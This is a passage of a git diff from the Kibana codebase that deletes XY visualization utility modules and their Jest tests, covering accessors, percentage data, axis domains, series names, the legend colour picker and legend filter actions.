accessor).toBe('function'); - expect((accessor as AccessorFn)({ 'col-0-2': 'some value' })).toBe('some value'); - }); - - it('should return simple string accessor for not range (date histogram) aggregation', () => { - const aspect = { - aggType: BUCKET_TYPES.DATE_HISTOGRAM, - ...aspectBase, - }; - const accessor = getComplexAccessor(COMPLEX_SPLIT_ACCESSOR)(aspect); - - expect(typeof accessor).toBe('string'); - expect(accessor).toBe('col-0-2'); - }); - - it('should return simple string accessor when aspect has no formatter', () => { - const aspect = { - aggType: BUCKET_TYPES.RANGE, - ...aspectBase, - formatter: undefined, - }; - const accessor = getComplexAccessor(COMPLEX_SPLIT_ACCESSOR)(aspect); - - expect(typeof accessor).toBe('string'); - expect(accessor).toBe('col-0-2'); - }); - - it('should return undefined when aspect has no accessor', () => { - const aspect = { - aggType: BUCKET_TYPES.RANGE, - ...aspectBase, - accessor: null, - }; - const accessor = getComplexAccessor(COMPLEX_SPLIT_ACCESSOR)(aspect); - - expect(accessor).toBeUndefined(); - }); -}); - -describe('isPercentileIdEqualToSeriesId', () => { - it('should be equal for plain column ids', () => { - const seriesColumnId = 'col-0-1'; - const columnId = `${seriesColumnId}`; - - const isEqual = isPercentileIdEqualToSeriesId(columnId, seriesColumnId); - expect(isEqual).toBeTruthy(); - }); - - it('should be equal for column with percentile', () => { - const seriesColumnId = '1'; - const columnId = `${seriesColumnId}.95`; - - const isEqual = isPercentileIdEqualToSeriesId(columnId, seriesColumnId); - expect(isEqual).toBeTruthy(); - }); - - it('should not be equal for column with percentile equal to seriesColumnId', () => { - const seriesColumnId = '1'; - const columnId = `2.1`; - - const isEqual = isPercentileIdEqualToSeriesId(columnId, seriesColumnId); - expect(isEqual).toBeFalsy(); - }); - - it('should be equal for column with percentile with decimal points', () => { - const seriesColumnId = '1'; - const 
columnId = `${seriesColumnId}['95.5']`; - - const isEqual = isPercentileIdEqualToSeriesId(columnId, seriesColumnId); - expect(isEqual).toBeTruthy(); - }); - - it('should not be equal for column with percentile with decimal points equal to seriesColumnId', () => { - const seriesColumnId = '1'; - const columnId = `2['1.3']`; - - const isEqual = isPercentileIdEqualToSeriesId(columnId, seriesColumnId); - expect(isEqual).toBeFalsy(); - }); - - it('should not be equal for column with percentile, where columnId contains seriesColumnId', () => { - const seriesColumnId = '1'; - const columnId = `${seriesColumnId}2.1`; - - const isEqual = isPercentileIdEqualToSeriesId(columnId, seriesColumnId); - expect(isEqual).toBeFalsy(); - }); -}); diff --git a/src/plugins/vis_types/xy/public/utils/accessors.tsx b/src/plugins/vis_types/xy/public/utils/accessors.tsx index 9739a9d3328ea..40f87f8e78061 100644 --- a/src/plugins/vis_types/xy/public/utils/accessors.tsx +++ b/src/plugins/vis_types/xy/public/utils/accessors.tsx 
@@ -6,78 +6,6 @@
 * Side Public License, v 1.
 */
-import { AccessorFn, Accessor } from '@elastic/charts';
-import { BUCKET_TYPES } from '@kbn/data-plugin/public';
-import { FakeParams } from '@kbn/visualizations-plugin/public';
-import type { Aspect } from '../types';
-
-export const COMPLEX_X_ACCESSOR = '__customXAccessor__';
-export const COMPLEX_SPLIT_ACCESSOR = '__complexSplitAccessor__';
-const SHARD_DELAY = 'shard_delay';
-
-export const getXAccessor = (aspect: Aspect): Accessor | AccessorFn => {
- return (
- getComplexAccessor(COMPLEX_X_ACCESSOR)(aspect) ??
- (() => (aspect.params as FakeParams)?.defaultValue)
- );
-};
-
-const getFieldName = (fieldName: string, index?: number) => {
- const indexStr = index !== undefined ? `::${index}` : '';
-
- return `${fieldName}${indexStr}`;
-};
-
-export const isRangeAggType = (type: string | null) =>
- type === BUCKET_TYPES.DATE_RANGE || type === BUCKET_TYPES.RANGE || type === BUCKET_TYPES.IP_RANGE;
-
-/**
- * Returns accessor function for complex accessor types
- * @param aspect
- * @param isComplex - forces to be functional/complex accessor
- */
-export const getComplexAccessor =
- (fieldName: string, isComplex: boolean = false) =>
- (aspect: Aspect, index?: number): Accessor | AccessorFn | undefined => {
- if (!aspect.accessor || aspect.aggType === SHARD_DELAY) {
- return;
- }
-
- if (!((isComplex || isRangeAggType(aspect.aggType)) && aspect.formatter)) {
- return aspect.accessor;
- }
-
- const formatter = aspect.formatter;
- const accessor = aspect.accessor;
- const fn: AccessorFn = (d) => {
- const v = d[accessor];
- if (v === undefined) {
- return;
- }
- const f = formatter(v);
- return f;
- };
-
- fn.fieldName = getFieldName(fieldName, index);
-
- return fn;
- };
-
-export const getSplitSeriesAccessorFnMap = (
- splitSeriesAccessors: Array
-): Map => {
- const m = new Map();
-
- splitSeriesAccessors.forEach((accessor, index) => {
- if (typeof accessor === 'function') {
- const fieldName = getFieldName(COMPLEX_SPLIT_ACCESSOR, index);
- m.set(fieldName, accessor);
- }
- });
-
- return m;
-};
-
 // For percentile, the aggregation id is coming in the form %s.%d, where %s is agg_id and %d - percents
 export const getSafeId = (columnId?: number | string | null) => {
 const id = String(columnId);
@@ -89,12 +17,3 @@ export const getSafeId = (columnId?: number | string | null) => {
 const baseId = id.substring(0, id.indexOf('[') !== -1 ? id.indexOf('[') : id.indexOf('.'));
 return baseId;
 };
-
-export const isPercentileIdEqualToSeriesId = (
- columnId: number | string | null | undefined,
- seriesColumnId: string
-) => getSafeId(columnId) === seriesColumnId;
-
-export const isValidSeriesForDimension = (seriesColumnId: string, { aggId, accessor }: Aspect) =>
- (aggId === seriesColumnId || isPercentileIdEqualToSeriesId(aggId ?? '', seriesColumnId)) &&
- accessor !== null;
diff --git a/src/plugins/vis_types/xy/public/utils/compute_percentage_data.test.ts b/src/plugins/vis_types/xy/public/utils/compute_percentage_data.test.ts
deleted file mode 100644
index 0429bb5253b6f..0000000000000
--- a/src/plugins/vis_types/xy/public/utils/compute_percentage_data.test.ts
+++ /dev/null
@@ -1,216 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { computePercentageData } from './compute_percentage_data'; - -const rowsOneMetric = [ - { - 'col-0-4': 'Kibana Airlines', - 'col-1-1': 85, - }, - { - 'col-0-4': 'ES-Air', - 'col-1-1': 84, - }, - { - 'col-0-4': 'Logstash Airways', - 'col-1-1': 82, - }, - { - 'col-0-4': 'JetBeats', - 'col-1-1': 81, - }, -]; - -const twoMetricsRows = [ - { - 'col-0-4': 'ES-Air', - 'col-1-5': 10, - 'col-2-1': 71, - 'col-3-1': 1, - }, - { - 'col-0-4': 'ES-Air', - 'col-1-5': 9, - 'col-2-1': 14, - 'col-3-1': 1, - }, - { - 'col-0-4': 'Kibana Airlines', - 'col-1-5': 5, - 'col-2-1': 71, - 'col-3-1': 0, - }, - { - 'col-0-4': 'Kibana Airlines', - 'col-1-5': 8, - 'col-2-1': 13, - 'col-3-1': 1, - }, - { - 'col-0-4': 'JetBeats', - 'col-1-5': 11, - 'col-2-1': 72, - 'col-3-1': 0, - }, - { - 'col-0-4': 'JetBeats', - 'col-1-5': 12, - 'col-2-1': 9, - 'col-3-1': 0, - }, - { - 'col-0-4': 'Logstash Airways', - 'col-1-5': 5, - 'col-2-1': 71, - 'col-3-1': 1, - }, - { - 'col-0-4': 'Logstash Airways', - 'col-1-5': 7, - 'col-2-1': 10, - 'col-3-1': 0, - }, -]; - -describe('computePercentageData', () => { - it('returns ratio 1 if there is only one metric in the axis', () => { - const data = computePercentageData(rowsOneMetric, 'col-0-4', ['col-1-1']); - expect(data).toStrictEqual([ - { - 'col-0-4': 'Kibana Airlines', - 'col-1-1': 1, - }, - { - 'col-0-4': 'ES-Air', - 'col-1-1': 1, - }, - { - 'col-0-4': 'Logstash Airways', - 'col-1-1': 1, - }, - { - 'col-0-4': 'JetBeats', - 'col-1-1': 1, - }, - ]); - }); - - it('returns correct ratio if there are two metrics in the same axis with no small multiples', () => { - const data = 
computePercentageData(twoMetricsRows, 'col-0-4', ['col-1-5', 'col-2-1']); - expect(data).toStrictEqual([ - { - 'col-0-4': 'ES-Air', - 'col-1-5': 0.09615384615384616, - 'col-2-1': 0.6826923076923077, - 'col-3-1': 1, - }, - { - 'col-0-4': 'ES-Air', - 'col-1-5': 0.08653846153846154, - 'col-2-1': 0.1346153846153846, - 'col-3-1': 1, - }, - { - 'col-0-4': 'Kibana Airlines', - 'col-1-5': 0.05154639175257732, - 'col-2-1': 0.7319587628865979, - 'col-3-1': 0, - }, - { - 'col-0-4': 'Kibana Airlines', - 'col-1-5': 0.08247422680412371, - 'col-2-1': 0.13402061855670103, - 'col-3-1': 1, - }, - { - 'col-0-4': 'JetBeats', - 'col-1-5': 0.10576923076923077, - 'col-2-1': 0.6923076923076923, - 'col-3-1': 0, - }, - { - 'col-0-4': 'JetBeats', - 'col-1-5': 0.11538461538461539, - 'col-2-1': 0.08653846153846154, - 'col-3-1': 0, - }, - { - 'col-0-4': 'Logstash Airways', - 'col-1-5': 0.053763440860215055, - 'col-2-1': 0.7634408602150538, - 'col-3-1': 1, - }, - { - 'col-0-4': 'Logstash Airways', - 'col-1-5': 0.07526881720430108, - 'col-2-1': 0.10752688172043011, - 'col-3-1': 0, - }, - ]); - }); - - it('returns correct ratio if there are two metrics in the same axis with small multiples', () => { - const data = computePercentageData( - twoMetricsRows, - 'col-0-4', - ['col-1-5', 'col-2-1'], - 'col-3-1' - ); - expect(data).toStrictEqual([ - { - 'col-0-4': 'ES-Air', - 'col-1-5': 0.09615384615384616, - 'col-2-1': 0.6826923076923077, - 'col-3-1': 1, - }, - { - 'col-0-4': 'ES-Air', - 'col-1-5': 0.08653846153846154, - 'col-2-1': 0.1346153846153846, - 'col-3-1': 1, - }, - { - 'col-0-4': 'Kibana Airlines', - 'col-1-5': 0.06578947368421052, - 'col-2-1': 0.9342105263157895, - 'col-3-1': 0, - }, - { - 'col-0-4': 'Kibana Airlines', - 'col-1-5': 0.38095238095238093, - 'col-2-1': 0.6190476190476191, - 'col-3-1': 1, - }, - { - 'col-0-4': 'JetBeats', - 'col-1-5': 0.10576923076923077, - 'col-2-1': 0.6923076923076923, - 'col-3-1': 0, - }, - { - 'col-0-4': 'JetBeats', - 'col-1-5': 0.11538461538461539, - 'col-2-1': 
0.08653846153846154,
- 'col-3-1': 0,
- },
- {
- 'col-0-4': 'Logstash Airways',
- 'col-1-5': 0.06578947368421052,
- 'col-2-1': 0.9342105263157895,
- 'col-3-1': 1,
- },
- {
- 'col-0-4': 'Logstash Airways',
- 'col-1-5': 0.4117647058823529,
- 'col-2-1': 0.5882352941176471,
- 'col-3-1': 0,
- },
- ]);
- });
-});
diff --git a/src/plugins/vis_types/xy/public/utils/compute_percentage_data.ts b/src/plugins/vis_types/xy/public/utils/compute_percentage_data.ts
deleted file mode 100644
index 65b43495d8c6d..0000000000000
--- a/src/plugins/vis_types/xy/public/utils/compute_percentage_data.ts
+++ /dev/null
@@ -1,31 +0,0 @@
-/*
- * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
- * or more contributor license agreements. Licensed under the Elastic License
- * 2.0 and the Server Side Public License, v 1; you may not use this file except
- * in compliance with, at your election, the Elastic License 2.0 or the Server
- * Side Public License, v 1.
- */
-import type { Accessor, AccessorFn } from '@elastic/charts';
-import { computeRatioByGroups } from '@elastic/charts';
-import type { DatatableRow } from '@kbn/expressions-plugin/public';
-
-export const computePercentageData = (
- rows: DatatableRow[],
- xAccessor: Accessor | AccessorFn,
- yAccessors: string[],
- splitChartAccessor?: string | null
-) => {
- // compute percentage mode data
- const groupAccessors = [String(xAccessor)];
- if (splitChartAccessor) {
- groupAccessors.push(splitChartAccessor);
- }
-
- return computeRatioByGroups(
- rows,
- groupAccessors,
- yAccessors.map((accessor) => {
- return [(d) => d[accessor], (d, v) => ({ ...d, [accessor]: v })];
- })
- );
-};
diff --git a/src/plugins/vis_types/xy/public/utils/domain.ts b/src/plugins/vis_types/xy/public/utils/domain.ts
deleted file mode 100644
index 1f07509f55aa1..0000000000000
--- a/src/plugins/vis_types/xy/public/utils/domain.ts
+++ /dev/null
@@ -1,84 +0,0 @@
-/*
- * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
- * or more contributor license agreements. Licensed under the Elastic License
- * 2.0 and the Server Side Public License, v 1; you may not use this file except
- * in compliance with, at your election, the Elastic License 2.0 or the Server
- * Side Public License, v 1.
- */
-
-import { uniq } from 'lodash';
-import { unitOfTime } from 'moment';
-
-import { DomainRange } from '@elastic/charts';
-
-import { getAdjustedInterval } from '@kbn/charts-plugin/public';
-import { Datatable } from '@kbn/expressions-plugin/public';
-import { DateHistogramParams, HistogramParams } from '@kbn/visualizations-plugin/public';
-
-import { Aspect } from '../types';
-
-export const getXDomain = (params: Aspect['params']): DomainRange => {
- const minInterval = (params as DateHistogramParams | HistogramParams)?.interval ?? undefined;
- const bounds = (params as DateHistogramParams).date
- ? (params as DateHistogramParams).bounds
- : null;
-
- if (bounds) {
- return {
- min: bounds.min as number,
- max: bounds.max as number,
- minInterval,
- };
- }
-
- return {
- minInterval,
- min: NaN,
- max: NaN,
- };
-};
-
-export const getAdjustedDomain = (
- data: Datatable['rows'],
- { accessor, params }: Aspect,
- timeZone: string,
- domain: DomainRange | undefined,
- hasBars?: boolean
-): DomainRange => {
- if (
- accessor &&
- domain &&
- 'min' in domain &&
- 'max' in domain &&
- 'intervalESValue' in params &&
- 'intervalESUnit' in params
- ) {
- const { interval, intervalESValue, intervalESUnit } = params;
- const xValues = uniq(data.map((d) => d[accessor]).sort());
-
- const [firstXValue] = xValues;
- const lastXValue = xValues[xValues.length - 1];
-
- const domainMin = Math.min(firstXValue, domain.min);
- const domainMaxValue = Math.max(domain.max - interval, lastXValue);
- const domainMax = hasBars ? domainMaxValue : domainMaxValue + interval;
- const minInterval = getAdjustedInterval(
- xValues,
- intervalESValue,
- intervalESUnit as unitOfTime.Base,
- timeZone
- );
-
- return {
- min: domainMin,
- max: domainMax,
- minInterval,
- };
- }
-
- return {
- minInterval: 'interval' in params ? params.interval : undefined,
- min: NaN,
- max: NaN,
- };
-};
diff --git a/src/plugins/vis_types/xy/public/utils/get_all_series.test.ts b/src/plugins/vis_types/xy/public/utils/get_all_series.test.ts
deleted file mode 100644
index 6c6b78dfd73f7..0000000000000
--- a/src/plugins/vis_types/xy/public/utils/get_all_series.test.ts
+++ /dev/null
@@ -1,183 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { getAllSeries } from './get_all_series'; - -const rowsNoSplitSeries = [ - { - 'col-0-4': 'Kibana Airlines', - 'col-1-1': 85, - }, - { - 'col-0-4': 'ES-Air', - 'col-1-1': 84, - }, - { - 'col-0-4': 'Logstash Airways', - 'col-1-1': 82, - }, - { - 'col-0-4': 'JetBeats', - 'col-1-1': 81, - }, -]; - -const rowsWithSplitSeries = [ - { - 'col-0-4': 'ES-Air', - 'col-1-5': 0, - 'col-2-1': 71, - }, - { - 'col-0-4': 'ES-Air', - 'col-1-5': 1, - 'col-2-1': 14, - }, - { - 'col-0-4': 'Kibana Airlines', - 'col-1-5': 0, - 'col-2-1': 71, - }, - { - 'col-0-4': 'Kibana Airlines', - 'col-1-5': 1, - 'col-2-1': 13, - }, - { - 'col-0-4': 'JetBeats', - 'col-1-5': 0, - 'col-2-1': 72, - }, - { - 'col-0-4': 'JetBeats', - 'col-1-5': 1, - 'col-2-1': 9, - }, - { - 'col-0-4': 'Logstash Airways', - 'col-1-5': 0, - 'col-2-1': 71, - }, - { - 'col-0-4': 'Logstash Airways', - 'col-1-5': 1, - 'col-2-1': 10, - }, -]; - -const yAspects = [ - { - accessor: 'col-2-1', - column: 2, - title: 'Count', - format: { - id: 'number', - }, - aggType: 'count', - aggId: '1', - params: {}, - }, -]; - -const myltipleYAspects = [ - { - accessor: 'col-2-1', - column: 2, - title: 'Count', - format: { - id: 'number', - }, - aggType: 'count', - aggId: '1', - params: {}, - }, - { - accessor: 'col-3-4', - column: 3, - title: 'Average AvgTicketPrice', - format: { - id: 'number', - params: { - pattern: '$0,0.[00]', - }, - }, - aggType: 'avg', - aggId: '4', - params: {}, - }, -]; - -describe('getAllSeries', () => { - it('returns empty array if splitAccessors is undefined', () => { - const splitAccessors = undefined; - const series = 
getAllSeries(rowsNoSplitSeries, splitAccessors, yAspects); - expect(series).toStrictEqual([]); - }); - - it('returns an array of series names if splitAccessors is an array', () => { - const splitAccessors = [ - { - accessor: 'col-1-5', - }, - ]; - const series = getAllSeries(rowsWithSplitSeries, splitAccessors, yAspects); - expect(series).toStrictEqual([0, 1]); - }); - - it('returns the correct array of series names for two splitAccessors without duplicates', () => { - const splitAccessors = [ - { - accessor: 'col-0-4', - }, - { - accessor: 'col-1-5', - }, - ]; - const series = getAllSeries(rowsWithSplitSeries, splitAccessors, yAspects); - expect(series).toStrictEqual([ - 'ES-Air - 0', - 'ES-Air - 1', - 'Kibana Airlines - 0', - 'Kibana Airlines - 1', - 'JetBeats - 0', - 'JetBeats - 1', - 'Logstash Airways - 0', - 'Logstash Airways - 1', - ]); - }); - - it('returns the correct array of series names for two splitAccessors and two y axis', () => { - const splitAccessors = [ - { - accessor: 'col-0-4', - }, - { - accessor: 'col-1-5', - }, - ]; - const series = getAllSeries(rowsWithSplitSeries, splitAccessors, myltipleYAspects); - expect(series).toStrictEqual([ - 'ES-Air - 0: Count', - 'ES-Air - 0: Average AvgTicketPrice', - 'ES-Air - 1: Count', - 'ES-Air - 1: Average AvgTicketPrice', - 'Kibana Airlines - 0: Count', - 'Kibana Airlines - 0: Average AvgTicketPrice', - 'Kibana Airlines - 1: Count', - 'Kibana Airlines - 1: Average AvgTicketPrice', - 'JetBeats - 0: Count', - 'JetBeats - 0: Average AvgTicketPrice', - 'JetBeats - 1: Count', - 'JetBeats - 1: Average AvgTicketPrice', - 'Logstash Airways - 0: Count', - 'Logstash Airways - 0: Average AvgTicketPrice', - 'Logstash Airways - 1: Count', - 'Logstash Airways - 1: Average AvgTicketPrice', - ]); - }); -}); diff --git a/src/plugins/vis_types/xy/public/utils/get_all_series.ts b/src/plugins/vis_types/xy/public/utils/get_all_series.ts deleted file mode 100644 index 6ec625cb884c1..0000000000000 
--- a/src/plugins/vis_types/xy/public/utils/get_all_series.ts
+++ /dev/null
@@ -1,52 +0,0 @@
-/*
- * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
- * or more contributor license agreements. Licensed under the Elastic License
- * 2.0 and the Server Side Public License, v 1; you may not use this file except
- * in compliance with, at your election, the Elastic License 2.0 or the Server
- * Side Public License, v 1.
- */
-
-import { TickFormatter } from '@elastic/charts';
-import { DatatableRow } from '@kbn/expressions-plugin/public';
-import { Column, Aspect } from '../types';
-
-interface SplitAccessors {
- accessor: Column['id'];
- formatter?: TickFormatter;
-}
-
-export const getAllSeries = (
- rows: DatatableRow[],
- splitAccessors: SplitAccessors[] | undefined,
- yAspects: Aspect[]
-) => {
- const allSeries: string[] = [];
- if (!splitAccessors) return [];
-
- rows.forEach((row) => {
- let seriesName = '';
- splitAccessors?.forEach(({ accessor, formatter }) => {
- if (!accessor) return;
- const name = formatter ? formatter(row[accessor]) : row[accessor];
- if (seriesName) {
- seriesName += ` - ${name}`;
- } else {
- seriesName = name;
- }
- });
-
- // multiple y axis
- if (yAspects.length > 1) {
- yAspects.forEach((aspect) => {
- if (!allSeries.includes(`${seriesName}: ${aspect.title}`)) {
- allSeries.push(`${seriesName}: ${aspect.title}`);
- }
- });
- } else {
- if (!allSeries.includes(seriesName)) {
- allSeries.push(seriesName);
- }
- }
- });
- return allSeries;
-};
diff --git a/src/plugins/vis_types/xy/public/utils/get_color_picker.test.tsx b/src/plugins/vis_types/xy/public/utils/get_color_picker.test.tsx
deleted file mode 100644
index 6c541fc27161e..0000000000000
--- a/src/plugins/vis_types/xy/public/utils/get_color_picker.test.tsx
+++ /dev/null
@@ -1,98 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import React from 'react'; -import { LegendColorPickerProps, XYChartSeriesIdentifier } from '@elastic/charts'; -import { EuiPopover } from '@elastic/eui'; -import { mountWithIntl } from '@kbn/test-jest-helpers'; -import { ComponentType, ReactWrapper } from 'enzyme'; -import { getColorPicker } from './get_color_picker'; -import { ColorPicker } from '@kbn/charts-plugin/public'; -import type { PersistedState } from '@kbn/visualizations-plugin/public'; - -jest.mock('@elastic/charts', () => { - const original = jest.requireActual('@elastic/charts'); - - return { - ...original, - getSpecId: jest.fn(() => {}), - }; -}); - -describe('getColorPicker', function () { - const mockState = new Map(); - const uiState = { - get: jest - .fn() - .mockImplementation((key, fallback) => (mockState.has(key) ? 
mockState.get(key) : fallback)), - set: jest.fn().mockImplementation((key, value) => mockState.set(key, value)), - emit: jest.fn(), - setSilent: jest.fn(), - } as unknown as PersistedState; - - let wrapperProps: LegendColorPickerProps; - const Component: ComponentType = getColorPicker( - 'left', - jest.fn(), - jest.fn().mockImplementation((seriesIdentifier) => seriesIdentifier.seriesKeys[0]), - 'default', - uiState - ); - let wrapper: ReactWrapper; - - beforeAll(() => { - wrapperProps = { - color: 'rgb(109, 204, 177)', - onClose: jest.fn(), - onChange: jest.fn(), - anchor: document.createElement('div'), - seriesIdentifiers: [ - { - yAccessor: 'col-2-1', - splitAccessors: {}, - seriesKeys: ['Logstash Airways', 'col-2-1'], - specId: 'histogram-col-2-1', - key: 'groupId{__pseudo_stacked_group-ValueAxis-1__}spec{histogram-col-2-1}yAccessor{col-2-1}splitAccessors{col-1-3-Logstash Airways}', - } as XYChartSeriesIdentifier, - ], - }; - }); - - it('renders the color picker', () => { - wrapper = mountWithIntl(); - expect(wrapper.find(ColorPicker).length).toBe(1); - }); - - it('renders the color picker with the colorIsOverwritten prop set to false if color is not overwritten for the specific series', () => { - wrapper = mountWithIntl(); - expect(wrapper.find(ColorPicker).prop('colorIsOverwritten')).toBe(false); - }); - - it('renders the color picker with the colorIsOverwritten prop set to true if color is overwritten for the specific series', () => { - uiState.set('vis.colors', { 'Logstash Airways': '#6092c0' }); - wrapper = mountWithIntl(); - expect(wrapper.find(ColorPicker).prop('colorIsOverwritten')).toBe(true); - }); - - it('renders the picker on the correct position', () => { - wrapper = mountWithIntl(); - expect(wrapper.find(EuiPopover).prop('anchorPosition')).toEqual('rightCenter'); - }); - - it('renders the picker for kibana palette with useLegacyColors set to true', () => { - const LegacyPaletteComponent: ComponentType = getColorPicker( - 'left', - jest.fn(), - 
jest.fn(), - 'kibana_palette', - uiState - ); - wrapper = mountWithIntl(); - expect(wrapper.find(ColorPicker).prop('useLegacyColors')).toBe(true); - }); -}); diff --git a/src/plugins/vis_types/xy/public/utils/get_color_picker.tsx b/src/plugins/vis_types/xy/public/utils/get_color_picker.tsx deleted file mode 100644 index 18ba4296e2545..0000000000000 --- a/src/plugins/vis_types/xy/public/utils/get_color_picker.tsx +++ /dev/null 
@@ -1,92 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import React, { useCallback } from 'react'; - -import { LegendColorPicker, Position, XYChartSeriesIdentifier, SeriesName } from '@elastic/charts'; -import { PopoverAnchorPosition, EuiWrappingPopover, EuiOutsideClickDetector } from '@elastic/eui'; -import type { PersistedState } from '@kbn/visualizations-plugin/public'; -import { ColorPicker } from '@kbn/charts-plugin/public'; - -function getAnchorPosition(legendPosition: Position): PopoverAnchorPosition { - switch (legendPosition) { - case Position.Bottom: - return 'upCenter'; - case Position.Top: - return 'downCenter'; - case Position.Left: - return 'rightCenter'; - default: - return 'leftCenter'; - } -} - -const KEY_CODE_ENTER = 13; - -export const getColorPicker = - ( - legendPosition: Position, - setColor: (newColor: string | null, seriesKey: string | number) => void, - getSeriesName: (series: XYChartSeriesIdentifier) => SeriesName, - paletteName: string, - uiState: PersistedState - ): LegendColorPicker => - ({ anchor, color, onClose, onChange, seriesIdentifiers: [seriesIdentifier] }) => { - const seriesName = getSeriesName(seriesIdentifier as XYChartSeriesIdentifier); - const overwriteColors: Record = uiState?.get('vis.colors', {}); - const colorIsOverwritten = Object.keys(overwriteColors).includes(seriesName as string); - let keyDownEventOn = false; - - const handleChange = (newColor: string | null) => { - if (!seriesName) { - return; - } - if (newColor) { - onChange(newColor); - } - setColor(newColor, seriesName); - // close the popover if no color is applied or the user has clicked a color - if (!newColor || !keyDownEventOn) { - 
onClose(); - } - }; - - const onKeyDown = (e: React.KeyboardEvent) => { - if (e.keyCode === KEY_CODE_ENTER) { - onClose?.(); - } - keyDownEventOn = true; - }; - - const handleOutsideClick = useCallback(() => { - onClose?.(); - }, [onClose]); - - return ( - - - - - - ); - }; diff --git a/src/plugins/vis_types/xy/public/utils/get_legend_actions.tsx b/src/plugins/vis_types/xy/public/utils/get_legend_actions.tsx deleted file mode 100644 index 3d79b607c4da1..0000000000000 --- a/src/plugins/vis_types/xy/public/utils/get_legend_actions.tsx +++ /dev/null 
@@ -1,116 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import React, { useState, useEffect, useMemo } from 'react'; - -import { i18n } from '@kbn/i18n'; -import { EuiContextMenuPanelDescriptor, EuiIcon, EuiPopover, EuiContextMenu } from '@elastic/eui'; -import { - LegendAction, - XYChartSeriesIdentifier, - SeriesName, - useLegendAction, -} from '@elastic/charts'; - -import { ClickTriggerEvent } from '@kbn/charts-plugin/public'; - -export const getLegendActions = ( - canFilter: (data: ClickTriggerEvent | null) => Promise, - getFilterEventData: (series: XYChartSeriesIdentifier) => ClickTriggerEvent | null, - onFilter: (data: ClickTriggerEvent, negate?: any) => void, - getSeriesName: (series: XYChartSeriesIdentifier) => SeriesName -): LegendAction => { - return ({ series: [xySeries] }) => { - const [popoverOpen, setPopoverOpen] = useState(false); - const [isfilterable, setIsfilterable] = useState(false); - const series = xySeries as XYChartSeriesIdentifier; - const filterData = useMemo(() => getFilterEventData(series), [series]); - const [ref, onClose] = useLegendAction(); - - useEffect(() => { - (async () => setIsfilterable(await canFilter(filterData)))(); - }, [filterData]); - - if (!isfilterable || !filterData) { - return null; - } - - const name = getSeriesName(series); - const panels: EuiContextMenuPanelDescriptor[] = [ - { - id: 'main', - title: `${name}`, - items: [ - { - name: i18n.translate('visTypeXy.legend.filterForValueButtonAriaLabel', { - defaultMessage: 'Filter for value', - }), - 'data-test-subj': `legend-${name}-filterIn`, - icon: , - onClick: () => { - setPopoverOpen(false); - onFilter(filterData); - }, - }, - { - name: 
i18n.translate('visTypeXy.legend.filterOutValueButtonAriaLabel', { - defaultMessage: 'Filter out value', - }), - 'data-test-subj': `legend-${name}-filterOut`, - icon: , - onClick: () => { - setPopoverOpen(false); - onFilter(filterData, true); - }, - }, - ], - }, - ]; - - const Button = ( -
setPopoverOpen(!popoverOpen)} - onClick={() => setPopoverOpen(!popoverOpen)} - > - -
- ); - - return ( - { - setPopoverOpen(false); - onClose(); - }} - panelPaddingSize="none" - anchorPosition="upLeft" - title={i18n.translate('visTypeXy.legend.filterOptionsLegend', { - defaultMessage: '{legendDataLabel}, filter options', - values: { legendDataLabel: name }, - })} - > - - - ); - }; -}; diff --git a/src/plugins/vis_types/xy/public/utils/get_series_name_fn.test.ts b/src/plugins/vis_types/xy/public/utils/get_series_name_fn.test.ts deleted file mode 100644 index 88be9ab160896..0000000000000 --- a/src/plugins/vis_types/xy/public/utils/get_series_name_fn.test.ts +++ /dev/null 
@@ -1,145 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { XYChartSeriesIdentifier } from '@elastic/charts'; -import { getSeriesNameFn } from './get_series_name_fn'; - -const aspects = { - series: [ - { - accessor: 'col-1-3', - column: 1, - title: 'FlightDelayType: Descending', - format: { - id: 'terms', - params: { - id: 'string', - otherBucketLabel: 'Other', - missingBucketLabel: 'Missing', - }, - }, - aggType: 'terms', - aggId: '3', - params: {}, - }, - ], - x: { - accessor: 'col-0-2', - column: 0, - title: 'timestamp per day', - format: { - id: 'date', - params: { - pattern: 'YYYY-MM-DD', - }, - }, - aggType: 'date_histogram', - aggId: '2', - params: { - date: true, - intervalESUnit: 'd', - intervalESValue: 1, - interval: 86400000, - format: 'YYYY-MM-DD', - }, - }, - y: [ - { - accessor: 'col-1-1', - column: 1, - title: 'Count', - format: { - id: 'number', - }, - aggType: 'count', - aggId: '1', - params: {}, - }, - ], -}; - -const series = { - specId: 'histogram-col-1-1', - seriesKeys: ['col-1-1'], - yAccessor: 'col-1-1', - splitAccessors: [], - smVerticalAccessorValue: '__ECH_DEFAULT_SINGLE_PANEL_SM_VALUE__', - smHorizontalAccessorValue: '__ECH_DEFAULT_SINGLE_PANEL_SM_VALUE__', - groupId: '__pseudo_stacked_group-ValueAxis-1__', - seriesType: 'bar', - 